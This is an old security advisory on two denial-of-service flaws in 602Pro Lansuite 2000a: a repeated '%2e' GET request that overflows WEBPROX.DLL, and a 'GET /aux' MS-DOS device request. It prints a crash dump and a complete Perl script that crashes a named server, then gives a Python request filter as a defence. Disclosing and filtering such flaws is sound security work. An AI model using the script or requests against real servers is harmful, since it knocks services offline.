26th Mar 2001 [SBWID-2048]
COMMAND
	    602Pro Lansuite
SYSTEMS AFFECTED
	    602Pro Lansuite 2000a 1.0.34 - prior
PROBLEM
	    'nitr0s' found the following.  There are 2 problems: the first is a
	    buffer overflow in WEBPROX.DLL and the other relates to
	    MS-DOS device files.  Credit should be given to Peter Grundl, who
	    made nitr0s think of trying the same problem that he found in
	    Alt-N Technologies MDaemon WebConfiguration feature, which also
	    affects Xitami Webserver 2.4b5 and probably a whole load of other
	    Windows server programs.
	    Connect to the webserver and send the following request:
	
	        GET /%2e%2e%2e%2e.... /HTTP/1.0
	
	    where %2e is repeated over 157 times.
	    Depending on how many times %2e or [.] is sent, the server will
	    exit displaying the following error:
	
	        LANSUITE caused an invalid page fault in
	        module WEBPROX.DLL at 015f:008a1326.
	        Registers:
	        EAX=0000000a CS=015f EIP=008a1326
	        EFLGS=00010216
	        EBX=00000008 SS=0167 ESP=05202848
	        EBP=05202848
	        ECX=0000000a DS=0167 ESI=81648e38 FS=2c37
	        EDX=334f2b1f ES=0167 EDI=81623ff0 GS=0000
	        Bytes at CS:EIP:
	        8b 48 2c 83 e1 01 85 c9 74 2d 8b 55 08 c7 42 18
	        Stack dump:
	        052029dc 00862e9a 0000000a 334f2b1f 000000fa
	        81623ff0 81648e38 00000008 bff7b317 018d0000
	        00000000 018d1650 018d1650 0520ace7 018d164c
	        052028cc
	
	    The other problem involves requests for MS-DOS device files.  Send the
	    following request to the webserver on port 80:
	
	        GET /aux
	
	    The code:
	
	    #!/usr/bin/perl
	    #
	    # 602Pro Lansuite 2000a 1.0.34 Denial Of Service
	    #
	    #
	    # Malformed GET request
	    #
	    use Getopt::Std;
	    use Socket;
	    getopts('s:', \%args);
	    if(!defined($args{s})){&usage;}
	    my ($serv,$port,$foo,$number,$data,$buf,$in_addr,$paddr,$proto);
	    $foo = "%2e";
	    $number = "160";
	    $data .= $foo x $number;
	    $serv = $args{s};
	    $port =  80;
	    $buf = "GET /$data /HTTP/1.0\r\n\r\n";
	    $in_addr = (gethostbyname($serv))[4] || die("Error: $!\n");
	    $paddr = sockaddr_in($port, $in_addr) || die("Error: $!\n");
	    $proto = getprotobyname('tcp') || die("Error: $!\n");
	    socket(S, PF_INET, SOCK_STREAM, $proto) || die("Error: $!");
	    connect(S, $paddr) || die("Error: $!");
	    select(S); $| = 1; select(STDOUT);
	    print S "$buf";
	    print("Data has been successfully sent to $serv\n");
	    sub usage {die("\n\n$0 -s <server>\n\n");}
	
SOLUTION
	    Not sure what build nitr0s tried, but something similar was  found
	    in the past so please take a look at:
	
	        http://oliver.efri.hr/~crv/security/bugs/Others/602lswa.html
	
	    As for the second problem, that one is OS related.  Filtering could
	    help here anyway.
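
	    One way to implement the filtering mentioned above, as an added
	    example that is not part of the original advisory or the vendor's
	    code: a Python check that a proxy or request hook in front of the
	    web server could apply to each request line.  The function name,
	    the two limits and the sample requests are assumptions made for
	    illustration.

```python
import re
from urllib.parse import unquote

# Reserved MS-DOS device names. Windows resolves them in any directory and
# with any extension (e.g. "aux", "AUX.txt", "com1.html").
DOS_DEVICES = {"CON", "PRN", "AUX", "NUL", "CLOCK$"} | {
    f"{p}{n}" for p in ("COM", "LPT") for n in range(1, 10)
}
MAX_DOT_RUN = 2      # assumption: ".." is the longest legitimate run of dots
MAX_PATH_LEN = 2048  # assumption: site-specific cap on the decoded path


def reject_reason(request_line):
    """Return why a request line should be dropped, or None if it passes."""
    parts = request_line.strip().split(" ")
    if len(parts) < 2 or parts[0] not in ("GET", "HEAD", "POST"):
        return "malformed request line"
    path = parts[1].split("?", 1)[0]
    # Decode repeatedly so double encoding ("%252e") cannot hide dots.
    for _ in range(3):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    if len(path) > MAX_PATH_LEN:
        return "path too long"
    if re.search(r"\.{%d,}" % (MAX_DOT_RUN + 1), path):
        return "long run of dots"
    for segment in re.split(r"[/\\]", path):
        # The device name is whatever precedes the first dot or colon.
        base = re.split(r"[.:]", segment, maxsplit=1)[0].strip().upper()
        if base in DOS_DEVICES:
            return "MS-DOS device name: " + base
    return None


if __name__ == "__main__":
    # Constructed sample request lines, modelled on the two requests above.
    samples = [
        "GET /index.html HTTP/1.0",
        "GET /" + "%2e" * 160 + " /HTTP/1.0",
        "GET /aux",
        "GET /docs/../Com1.html HTTP/1.0",
        "GET /auxiliary/page.html HTTP/1.0",
    ]
    for line in samples:
        print(f"{line[:40]!r:45} -> {reject_reason(line) or 'pass'}")
```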
	
